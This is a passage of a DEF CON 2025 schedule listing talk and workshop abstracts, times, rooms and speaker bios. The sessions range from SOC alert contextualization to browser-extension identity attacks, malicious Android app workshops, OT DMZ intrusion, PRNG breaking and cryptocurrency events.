Title: Contextualizing alerts & logs at scale without queries or LLMs (opensource)
When: Friday, Aug 8, 15:00 - 15:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

IoT environments generate massive, noisy streams of logs and alerts—most of which lack the context needed for meaningful detection or response. This talk introduces a novel, LLM-free approach to large-scale alert contextualization that doesn't rely on writing complex queries or integrating heavy ML models. We’ll demonstrate how lightweight, modular correlation logic can automatically enrich logs, infer context, and group related events across sensors, devices, and cloud services. By leveraging time, topology, and behavioral attributes, this method builds causality sequences that explain what happened, where, and why—without human-crafted rules or expensive AI inference. Attendees will walk away with practical techniques and open-source tools for deploying contextualization pipelines in resource-constrained IoT environments. Whether you're defending smart homes, industrial OT networks, or edge devices, you'll learn how to extract insight from noise—fast.

SpeakerBio:  Ezz Tahoun

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: Contextualizing alerts with relevant logs and events without queries or LLMs
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N252 - Map

Description:

This workshop is for SOC analysts, threat hunters, and defenders dealing with alert fatigue, fragmented telemetry, and the challenge of spotting coordinated attacks. Instead of large language models or costly vendor tools, we’ll use open-source, explainable ML to map alerts, logs, and events into contextualized attack stories.

Attendees will work hands-on with real-world-style data to find root causes, build kill chains, and generate actionable tickets—False Positive, Incident, and Attack Story—that mirror real SOC workflows. We’ll use the Attack Flow Detector tool, which runs in Google Colab—no install needed.

No data science experience required. The class is technical but beginner-friendly, with guided exercises and examples. Basic knowledge of logs and MITRE ATT\&CK helps but isn’t required. The focus is on outcomes: understanding what happened, why, and how to respond—without black-box AI or complex queries.

By the end, students will know how to clean noisy data, map alerts to attacker techniques, cluster related events, and build end-to-end attack narratives. All tools and content are open-source, transparent, and ready to use in real environments.

SpeakerBio:  Ezz Tahoun

Ezz Tahoun is an award-winning cybersecurity data scientist recognized globally for his innovations in applying AI to security operations. He has presented at multiple DEFCON villages, including Blue Team, Cloud, Industrial Control Systems (ICS), Adversary, Wall of Sheep, Packet Hacking, Telecom, and Creator Stage, as well as BlackHat Sector, MEA, EU, and GISEC. His groundbreaking work earned him accolades from Yale, Princeton, Northwestern, NATO, Microsoft, and Canada's Communications Security Establishment. At 19, Ezz began his PhD in Computer Science at the University of Waterloo, quickly gaining recognition through 20 influential papers and 15 open-source cybersecurity tools. His professional experience includes leading advanced AI-driven projects for Orange CyberDefense, Forescout, RBC, and Huawei Technologies US. Holding certifications such as aCCISO, CISM, CRISC, GCIH, GSEC, CEH, and GCP-Cloud Architect, Ezz previously served as an adjunct professor in cyber defense and warfare.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 11:00-11:45 PDT


Title: Copycat - Identity Stealer Extension
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

Copycat is a browser extension-based red team toolkit for simulating web-based identity attacks. This tool simulates ten web-based identity attacks through a single browser extension with minimal permissions, operating primarily through hidden windows that execute attacks without user awareness. With Copycat, red teams can simulate complex attack scenarios including silent Gmail and LinkedIn hijacking, credential theft through login and OTP stealing, login page redirection, autofill extraction from enterprise applications, and multiple OAuth manipulation techniques. Copycat runs entirely in-browser with no special hardware requirements. Red teams can use Copycat to demonstrate attack vectors that bypass EDRs, SASE, and other traditional security controls, as these techniques operate within legitimate authenticated sessions rather than breaking them. The tool is fully modifiable, with each module designed for customization to target different services or authentication flows. Source code and documentation will be available for security researchers to extend and improve the framework. Special mention to Pankaj Sharma, Tejeswara S. Reddy, and Arpit Gupta for their contributions in building this toolkit!

Speakers:Dakshitaa Babu,Shourya Pratap Singh

SpeakerBio:  Dakshitaa Babu

Dakshitaa is a security researcher and product evangelist at SquareX, where she leads the security research team. A self-taught cybersecurity researcher mentored by offensive security veteran Vivek Ramachandran, she specializes in web attacks — malicious websites, files, scripts, and extensions capable of bypassing traditional security solutions. Her research directly fuels SquareX's product innovation, ensuring it stays ahead of evolving threats. As a product evangelist, she is the principal author of SquareX's technical collateral. She has contributed to bleeding-edge browser security research presented at BSides SF Adversary Village, Recon Village, and the DEF CON main stage. Her work on email security bypasses, breaking secure web gateways, MV3 extension vulnerabilities, browser syncjacking, polymorphic extensions, and browser-native ransomware has been covered by leading media outlets, including Forbes, TechRadar, Mashable, The Register, Bleeping Computer, and CyberNews.

SpeakerBio:  Shourya Pratap Singh

Shourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEFCON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 12:00-12:45 PDT


Title: Copycat - Identity Stealer Extension
When: Friday, Aug 8, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Copycat is a browser extension-based red team toolkit for simulating web-based identity attacks. This tool simulates ten web-based identity attacks through a single browser extension with minimal permissions, operating primarily through hidden windows that execute attacks without user awareness. With Copycat, red teams can simulate complex attack scenarios including silent Gmail and LinkedIn hijacking, credential theft through login and OTP stealing, login page redirection, autofill extraction from enterprise applications, and multiple OAuth manipulation techniques. Copycat runs entirely in-browser with no special hardware requirements. Red teams can use Copycat to demonstrate attack vectors that bypass EDRs, SASE, and other traditional security controls, as these techniques operate within legitimate authenticated sessions rather than breaking them. The tool is fully modifiable, with each module designed for customization to target different services or authentication flows. Source code and documentation will be available for security researchers to extend and improve the framework. Special mention to Pankaj Sharma, Tejeswara S. Reddy, and Arpit Gupta for their contributions in building this toolkit!

Speakers:Dakshitaa Babu,Shourya Pratap Singh

SpeakerBio:  Dakshitaa Babu

Dakshitaa is a security researcher and product evangelist at SquareX, where she leads the security research team. A self-taught cybersecurity researcher mentored by offensive security veteran Vivek Ramachandran, she specializes in web attacks — malicious websites, files, scripts, and extensions capable of bypassing traditional security solutions. Her research directly fuels SquareX's product innovation, ensuring it stays ahead of evolving threats. As a product evangelist, she is the principal author of SquareX's technical collateral. She has contributed to bleeding-edge browser security research presented at BSides SF Adversary Village, Recon Village, and the DEF CON main stage. Her work on email security bypasses, breaking secure web gateways, MV3 extension vulnerabilities, browser syncjacking, polymorphic extensions, and browser-native ransomware has been covered by leading media outlets, including Forbes, TechRadar, Mashable, The Register, Bleeping Computer, and CyberNews.

SpeakerBio:  Shourya Pratap Singh

Shourya Pratap Singh is responsible for building SquareX's security-focused extension and conducts research on countering web security risks. As a rising figure in cybersecurity, Shourya has presented his work on global stages including the DEFCON main stage, Recon Village, and Adversary Village, as well as at Black Hat Arsenal EU. He has also delivered several workshops at prestigious events such as the Texas Cyber Summit. Shourya earned his bachelor's degree from IIIT Bhubaneswar and holds a patent. His professional interests focus on strengthening the security of browser extensions and web applications.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Saturday - 15:00-15:30 PDT


Title: Countering Forensics Software by Baiting Them
When: Saturday, Aug 9, 15:00 - 15:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

There's been remarkably little discussion about how mobile forensic tools fare against adversarially modified environments, particularly in terms of forensic reliability. Tools (and investigators) often assume that target devices function as expected, with minimal scrutiny of whether that assumption holds. Our research demonstrates otherwise - sophisticated anti-forensic techniques placed within Android devices can silently compromise evidence, placing longstanding investigative and extraction methodologies at risk.

Our research addresses a blind spot in Android logical extraction workflows - namely, an assumption that once mobile forensic software overcome the hurdle of device access, the extraction is assumed to follow correctly. While forensics software excel at getting a foot in the door, from our actual tests they offer little against stealthy, second-layer countermeasures that can silently manipulate or destroy data post-access.

Speakers:Weihan Goh,Joseph Lim,Isaac Soon

SpeakerBio:  Weihan Goh, Associate Professor at the Singapore Institute of Technology (SIT)

Dr Weihan Goh is an Associate Professor at the Singapore Institute of Technology (SIT). His research interests include digital forensics, anti-forensics, security testing, as well as technologies for cybersecurity education such as cyber ranges, CTF / CDX, remote proctoring, and anti-fraud / anti-cheat systems. Beyond teaching and research, Dr Goh participates in capture-the-flag exercises, going by the CTF handler 'icebear'.

SpeakerBio:  Joseph Lim, Final-year Information Security Student, Singapore Institute of Technology

Joseph Lim is an Information Security undergraduate at the Singapore Institute of Technology, with a diploma in Infocomm Security Management from Singapore Polytechnic. With a strong foundation in cybersecurity, he is particularly interested in mobile security and digital forensics. Joseph has also previously presented research on mobile malware at the 14th ACM Conference on Data and Application Security and Privacy (2024).

SpeakerBio:  Isaac Soon, Final-year Information Security Student, Singapore Institute of Technology

Soon Leung Isaac is currently pursuing a degree in Information and Communication Technology, specializing in Information Security, at the Singapore Institute of Technology. Previously, he served as a SOC analyst in the Singapore Armed Forces for two years, where he was responsible for safeguarding Singapore's military network. His main areas of research include offensive security and mobile security.


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Saturday - 12:00-12:59 PDT


Title: Cracking Chaos: Making, Using, and Breaking PRNGs
When: Saturday, Aug 9, 12:00 - 12:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Pseudo-Random Number Generators are often overlooked and core features of our computational experience. From research and processes irrelevant to security (i.e. Monte-Carlo simulations) to essential security functionality like secret generation, random number generation plays a significant part in our ability to utilize the modern internet. In turn, they have a unique history, threat model, and set of applications. We will discuss the history of pseudo-random number generation, the types of random number generators, where they are supposed to be utilized, and how to break them, when relevant. Additionally, we will discuss the future direction of random number generation in light of preparation for the advent of large-scale quantum computing.

SpeakerBio:  1nfocalypse

1nfocalypse is a software engineer with an interest in coding theory, cryptography, and numerical analysis. He is currently working on portions of libstdc++-v3 and enjoys implementing/tinkering with cryptographic primitives and standards.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-11:50 PDT


Title: Creating an AI Agent to Hack a Web Application
When: Saturday, Aug 9, 11:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 1 - Map

Description:

AI 🤖 is being discussed in pretty much all presentations out there. So, what is different about this session? This is a completely hands-on workshop where we will explore cutting edge agentic frameworks through the creation of an AI agent designed to hack web applications 🌐. You will learn how to develop a modular AI agent capable of performing reconnaissance, vulnerability scanning, and exploiting a web application. We will cover an overview of current AI techniques applicable to red team operations through live demonstrations and interactive exercises.

🚀 Join Omar Santos at DEF CON's Red Team Village to explore how the fusion of AI and red teaming not only redefines the landscape of cyber offensive operations, but also sets the stage for pioneering defensive countermeasures .

🛡️ This workshop promises to equip you with both the knowledge and practical skills to leverage AI in red team operations.

SpeakerBio:  Omar Santos

Omar Santos is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. Omar is a Distinguished Engineer at Cisco focusing on artificial intelligence (AI) security, cybersecurity research, incident response, and vulnerability disclosure. He is a board member of the OASIS Open standards organization and the founder of OpenEoX. Omar is the co-chair of the Coalition of Secure AI (CoSAI). Omar's collaborative efforts extend to numerous organizations, including the Forum of Incident Response and Security Teams (FIRST) and the Industry Consortium for Advancement of Security on the Internet (ICASI). Omar is the co-chair of the FIRST PSIRT Special Interest Group (SIG). Omar is the co-founder of the DEF CON Red Team Village and the chair of the Common Security Advisory Framework (CSAF) technical committee.

Omar is the author of over 25 books, 21 video courses, and over 50 academic research papers. Omar is a renowned expert in ethical hacking, vulnerability research, incident response, and AI security. He employs his deep understanding of these disciplines to help organizations stay ahead of emerging threats. His dedication to cybersecurity has made a significant impact on technology standards, businesses, academic institutions, government agencies, and other entities striving to improve their cybersecurity programs. Prior to Cisco, Omar served in the United States Marines focusing on the deployment, testing, and maintenance of Command, Control, Communications, Computer and Intelligence (C4I) systems.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Sunday - 11:00-11:45 PDT


Title: Creating Integrated Threat Surveillance: AI + OSINT + Security Onion
When: Sunday, Aug 10, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:
SpeakerBio:  Desiree Wilson

With over 15 years of global experience across all domains of information security, she is a trusted leader in cybersecurity architecture, cloud adoption, DFIR, and threat intelligence. Her work emphasizes proactive defense—prioritizing prevention, early detection, and rapid response across hybrid environments. As a Principal Consultant with Quantum Mergers, she has guided highly regulated organizations through cloud deployments, DFIR engagements, and the design of advanced cybersecurity frameworks that integrate offensive and defensive strategies. Her expertise spans securing APIs, blockchain platforms, and AI/ML systems, aligning innovation with risk-based security. A member of the Forbes Business Council, she contributes strategic insights that help global enterprises build trust, scale securely, and outpace threats through intelligence-driven security. She serves as a board advisor to several organizations and is a philanthropic supporter of nonprofit initiatives focused on women’s rights and global education. A passionate advocate for equity and opportunity, she balances her professional pursuits with family time, a love for live music, the arts, her three pets, and a nomadic lifestyle that reflects her identity as a global citizen.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Sunday - 09:00-12:59 PDT


Title: Creating malicious functional app on Android
When: Sunday, Aug 10, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N255 - Map

Description:

This workshop provides an in-depth, hands-on experience in the creation and analysis of malicious applications, focusing on the techniques used by attackers to compromise mobile devices. Participants will learn how to manipulate Android applications using tools such as Android Studio, APKTool, Burp Suite, and Metasploit to inject payloads, bypass security mechanisms, and establish remote access. Through step-by-step demonstrations, they will explore methods for obfuscation, privilege escalation, and persistence, gaining a clear understanding of how adversaries exploit vulnerabilities in mobile environments.

Beyond offensive techniques, the workshop emphasizes defensive strategies, equipping attendees with skills to detect, analyze, and mitigate mobile threats. Using malware analysis and reverse engineering, students will learn how security professionals track, neutralize, and prevent attacks. Real-time lab exercises will reinforce these concepts, ensuring that participants leave with practical expertise applicable to ethical hacking, penetration testing, and security research. This session is ideal for cybersecurity professionals, developers, and researchers looking to deepen their knowledge of mobile security and ethical hacking methodologies.

SpeakerBio:  HackeMate, Offensive Cybersecurity Engineer

HackeMate is the YouTube channel where Gianpaul Custodio, a Offensive Cybersecurity Engineer, shares his expertise in ethical hacking, as well as offensive and defensive security. With over 28,000 subscribers engaged in the world of cybersecurity, he has established himself as a key figure in the community through challenges, technical analyses, and hands-on demonstrations.

Professionally, he holds Red Team certifications such as the eLearnSecurity Junior Penetration Tester (eJPT) and Web Penetration Tester (eWPT), along with Blue Team certifications like Microsoft Azure Fundamentals (AZ-900) and Microsoft Security, Compliance, and Identity Fundamentals (SC-900). He is also a Google Product Expert for Google Drive, contributing his knowledge in cloud security and optimization.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 13:30-14:30 PDT


Title: Creator Panel Discussion
When: Friday, Aug 8, 13:30 - 14:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:
Speakers:Ben "nahamsec" Sadeghipour,Justin "rhynorater" Gardner,Katie "InsiderPhD" Paxton-Fear

SpeakerBio:  Ben "nahamsec" Sadeghipour, Co-Founder & CEO at HackingHub

Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.

SpeakerBio:  Justin "rhynorater" Gardner, Advisor at Caido

I'm a full-time Bug Bounty Hunter and Host of the Critical Thinking - Bug Bounty Podcast. I also work as an Advisor for Caido (HTTP Proxy). When I'm not putting in reports or disseminating technical info on the pod, I'm normally spending time with my wife and 2 daughters, lifting heavy things, playing volleyball, or getting folded in BJJ

SpeakerBio:  Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by Harness

Dr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Saturday - 10:00-10:30 PDT


Title: Critically Neglected: Cybersecurity for buildings
When: Saturday, Aug 9, 10:00 - 10:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

Buildings are largely overlooked when it comes to cyber security. The onus is typically placed on physically securing the building and the people inside of them. What most gloss over is the fact that industrial control systems run these buildings and without them, every day functions become unavailable and downright dangerous. The dangers are growing as buildings become more "connected" and require internet access to operate (ex. sustainability and IoT). Malicious use of engineering protocols (Modbus, Fox, BACNet) and targeted attacks against BAS systems are growing (ex. KNXLock).”

Environments run the gamut from overly secure, to the point of crippling, all the way to leaving RDP exposed with no logging or MFA to critical systems. There is no easy fix, properties must invest in technology and people to create a defensible environment. This presentation will show how cyber security can be enabled which fits with the business's operations and minimal disruption.

Building types are not constrained to only office space. Properties come in all varieties from warehouses and manufacturing spaces to data centers and shopping malls. All of this needs to be taken into account when assessing the environment and recommending tools and procedures. This talk will cover common architectures seen, typical control systems found in buildings (BMS, FLS, elevator, lighting, power...), reproducible steps to help companies/users understand their vulnerabilities and how we, as an industry, move forward.

For the most part, these are not technical problems, but a literal gap that needs to be addressed directly by budgetary and policy controls. The industry is pushing for cybersecurity budgeting, standards and visibility for properties, which are largely ignored or misunderstood by owners and operators. This is a solvable problem and I want attendees to feel empowered to ask tough questions and be prepared to have an educated conversation about the risks and not use fear mongering or scare tactics to get cybersecurity put in place.

SpeakerBio:  Thomas Pope, JIL

Thomas Pope is the Head of Property Cybersecurity at Jones Lang Lasalle (JLL). His team assists customers and internal teams with securing control systems at their properties and how to accomplish cybersecurity at scale with regards to building operations. Previous stints including leading incident response engagements at Cisco Talos as an Incident Commander, Adversary Hunter at Dragos; searching for ICS-specific adversaries and standing up multiple cybersecurity programs at Duke Energy.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Friday - 17:30-17:59 PDT


Title: Crossing the Line: Advanced Techniques to Breach the OT DMZ
When: Friday, Aug 8, 17:30 - 17:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

As industrial environments become increasingly interconnected, the OT DMZ stands as a critical yet vulnerable boundary between enterprise IT networks and operational technology. In this talk, we expose the offensive strategies adversaries use to penetrate the OT DMZ and pivot into sensitive control system networks. Drawing from real-world red team operations and threat intelligence, we’ll explore how misconfigured remote access solutions, poorly segmented architectures, and legacy services create exploitable pathways into industrial environments. Attendees will gain insight into tradecraft used to move from enterprise footholds into OT networks, including techniques for identifying and abusing jump hosts, proxy services, Citrix gateways, and RDP relays. We’ll demonstrate practical TTPs for lateral movement, credential access, and evasion within the DMZ layer—highlighting how assumptions about segmentation often fall short in practice. Finally, we’ll discuss defensive takeaways to help asset owners detect and mitigate these threats before they escalate. This presentation is aimed at offensive security professionals, defenders, and industrial security leaders seeking to understand how the OT perimeter is being targeted—and how to better protect it.

SpeakerBio:  Christopher Nourrie, SCE

Christopher Nourrie is a threat hunter at Southern California Edison (SCE). He specializes in IT and OT threat hunting while supporting the Red Team program. With over 11 years of experience in offensive security, his expertise includes penetration testing, network security assessments, and adversary emulation. Before joining SCE, Chris was a Principal Penetration Tester at Dragos, Inc., concentrating on red teaming and penetration testing within industrial environments. He also served as an Exploitation Analyst at the National Security Agency (NSA) within the Tailored Access Operations (TAO) division under U.S. Cyber Command, supporting offensive cyber operations. His expertise encompasses open-source intelligence (OSINT), network reconnaissance,, and advanced attack methodologies. Chris also played a pivotal role in cybersecurity education, teaching advanced adversary tactics at the NSA’s National Cryptologic School. He is the author of Pentesting Industrial Networks and delivers an OT penetration testing course that helps security professionals strengthen their industrial cybersecurity defenses. Chris is a dedicated researcher who studies advanced threat actor tactics, techniques, and procedures (TTPs) targeting enterprise and industrial environments. He continuously integrates emerging insights into his tradecraft, refining methodologies to stay ahead of evolving cyber threats. His contributions to the field help organizations bolster their security posture against sophisticated adversaries.


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Sunday - 12:30-12:59 PDT


Title: Crypto Privacy Village: Closing Remarks
When: Sunday, Aug 10, 12:30 - 12:59 PDT
Where: LVCCWest-Level1-Hall1-W403 - Map

Description:
SpeakerBio:  Crypto Privacy Village Staff
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Sunday - 10:00-10:05 PDT


Title: Crypto Privacy Village: Welcome
When: Sunday, Aug 10, 10:00 - 10:05 PDT
Where: LVCCWest-Level1-Hall1-W403 - Map

Description:
SpeakerBio:  Crypto Privacy Village Staff
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Friday - 10:00-10:05 PDT


Title: Crypto Privacy Village: Welcome
When: Friday, Aug 8, 10:00 - 10:05 PDT
Where: LVCCWest-Level1-Hall1-W403 - Map

Description:
SpeakerBio:  Crypto Privacy Village Staff
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CPV - Saturday - 10:00-10:05 PDT


Title: Crypto Privacy Village: Welcome
When: Saturday, Aug 9, 10:00 - 10:05 PDT
Where: LVCCWest-Level1-Hall1-W403 - Map

Description:
SpeakerBio:  Crypto Privacy Village Staff
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 10:00-11:50 PDT


Title: Cryptocurrency Enforcement Actions
When: Saturday, Aug 9, 10:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Multiple agencies have attempted to regulate cryptocurrencies through various means. This workshop will begin with a short presentation about the different organizations with an interest in regulating cryptocurrency (SEC, CFTC, IRS, and DOJ) and provide examples of enforcement actions. Next, participants will break out into discussion groups to consider the pros and cons of regulation by enforcement. Then, participants will be given a hypothetical cryptocurrency and be assigned a role either as a 'regulator' or as a 'developer.' The participants will engage in a settlement type discussion to determine if the cryptocurrency should be regulated under one agency, multiple agencies, or not at all.

Speakers:Veronika,Chelsea Button

SpeakerBio:  Veronika
No BIO available
SpeakerBio:  Chelsea Button, Cryptocurrency Education Initiative

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 16:00-17:50 PDT


Title: Cryptocurrency Nodes and Relays
When: Saturday, Aug 9, 16:00 - 17:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Cryptocurrency nodes validate and relay transactions across the network. Like servers in a traditional financial system, nodes store a copy of the blockchain and enforce the network's rules. Many of us want to run their own node for reasons of security, convenience, and independence of other people's node configurations. Come to understand nodes, build your own, and explore configurations to test wallet applications on your new cryptocurrency node.

Speakers:Diego "rehrar" Salazar,Dan

SpeakerBio:  Diego "rehrar" Salazar

Diego 'rehrar' Salazar has been around the FOSS and cryptocurrency communities for eight years. He owns and runs Cypher Stack, a company that performs novel research and makes contributions to various FOSS projects. He has organized and managed several villages at defcon, c3, and more.

SpeakerBio:  Dan
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 11:00-11:59 PDT


Title: Cryptocurrency Opening Keynote
When: Friday, Aug 8, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Join your fellow hackers managing the Cryptocurrency areas of Defcon, and get a sneak peak of what each workshop teaches as well as an overview of the showcases and programs happening in our Defcon Community, Contest, and Vendor areas. Chad and Param will report on cryptocurrency trends and perspectives from their distinguished positions in industry and academy. We will announce the teams competing in the Cryptocurrency Cyber Challenge, and give an overview of what's available in the vending area. Meet the organizers of years of cryptocurrency content at Defcon and bring your questions to the Community Stage!

Speakers:Michael "MSvB" Schloh von Bennewitz,Chad Calease,Param D Pithadia

SpeakerBio:  Michael "MSvB" Schloh von Bennewitz, Chairman, Monero Devices

Michael Schloh von Bennewitz (MSvB) is a computer scientist specializing in cryptosecure electronics and embedded development. He is the founder of Monero Devices and responsible for research, development, and maintenance of Opensource software repositories. A prolific speaker in four languages, Michael presents at technical meetings every year.

SpeakerBio:  Chad Calease, Kraken

Chad Calease designs for failure—on purpose.​ At Kraken, he hovers where crypto, resilience engineering, and human behavior collide. A systems thinker with instincts that cultivate resilience, Chad champions the Kraken value of being “Productively Paranoid”—as both a design principle and a survival trait. His work challenges us to outpace risk, interrogate ease, and own our exposures before they own us—by building with the assumption that failure isn’t an if, but a when.

SpeakerBio:  Param D Pithadia, Georgia Institute of Technology

Param is an Electrical Engineering Student from Georgia Tech with a strong passion for and interest in crypto. Although he primarily got interested in cryptography and hardware security through a class at Georgia Tech, he is also working at a software company on crypto adoption and ease of use. With a unique blend of HW and SW skills, Param is truly enthusiastic about all aspects of crypto.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 11:00-11:59 PDT


Title: Cryptocurrency Weekend Keynote
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Reporting on the state of affairs in Cryptocurrency trends, Nick and Elaine give insight from their esteemed positions in industry and academy. Additionally, we get a status report of workshops, showcases, and programs in the Cryptocurrency areas of DEF CON. We announce the teams competing in the Cryptocurrency Cyber Challenge, and give an overview of what's available in the vending area. Meet the organizers of years of cryptocurrency content at DEF CON and bring your questions to the Community Stage!

Speakers:Chelsea Button,Nick "c7five" Percoco,Elaine Shi

SpeakerBio:  Chelsea Button, Cryptocurrency Education Initiative

Chelsea is a lawyer specializing in consumer finance, data and technology. She advises clients on updates in the law and defends them in litigation. She is a cryptocurrency advocate, with multiple professional publications.

SpeakerBio:  Nick "c7five" Percoco, CSO at Kraken

Nick Percoco is the Chief Security Officer at Kraken, where he spearheads the frameworks and protocols that ensure a secure and seamless trading experience for clients. A recognized leader in the security and hacker community, Nick brings nearly 30 years of expertise in cybersecurity and technology, shaping the industry's approach to threat defense and risk mitigation. A dedicated contributor to the security community, he founded THOTCON, Chicago’s premier non-profit hacking conference, and has been a contributor to secure infrastructure and network design at DEFCON, the world’s largest hacking conference, since 2017. An accomplished speaker and researcher, Nick has presented groundbreaking work on cryptocurrency security, targeted malware, mobile security (iOS & Android), and IoT vulnerabilities at leading global forums, including Black Hat, RSA Conference, DEFCON, CfC St. Moritz, and SXSW.

SpeakerBio:  Elaine Shi, Professor at Carnegie Mellon University

Elaine Shi is a Packard Fellow, Sloan Fellow, ACM Fellow, and IACR Fellow. A Professor with a joint appointment in CSD and ECE at Carnegie Mellon University, Elaine is also an Adjunct Professor of Computer Science at the University of Maryland. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. Elain is a co-founder of Oblivious Labs, Inc. My research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 11:20-11:50 PDT


Title: Cryptography is hard: Breaking the DoNex ransomware
When: Friday, Aug 8, 11:20 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Gijs Rijnders
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 13:00-13:45 PDT


Title: Cryptosploit
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

In 2022 a framework and tool for cryptographic attacks called Cryptosploit was introduced. In this workshop we will demo the capabilities and the underlying philosophy as well as new commands. This will include the flexibility of mixing and matching attack code with oracles and new commands to import and export cryptographic keys. In particular, we will demonstrate how after a successful attack on a public key, we will be able to export the private key corresponding to the certificate. The presentation will conclude with thoughts on improvements.

SpeakerBio:  Matt Cheung

Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given workshops at the Boston Application Security Conference, BSidesLV, DEF CON, and the Crypto and Privacy VillageHe now serves on the programming committee of the Crypto and Privacy Village. He now serves on the programming committee of the Crypto and Privacy Village.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 09:00-09:45 PDT


Title: Cryptosploit
When: Saturday, Aug 9, 09:00 - 09:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

In 2022 a framework and tool for cryptographic attacks called Cryptosploit was introduced. In this workshop we will demo the capabilities and the underlying philosophy as well as new commands. This will include the flexibility of mixing and matching attack code with oracles and new commands to import and export cryptographic keys. In particular, we will demonstrate how after a successful attack on a public key, we will be able to export the private key corresponding to the certificate. The presentation will conclude with thoughts on improvements.

SpeakerBio:  Matt Cheung

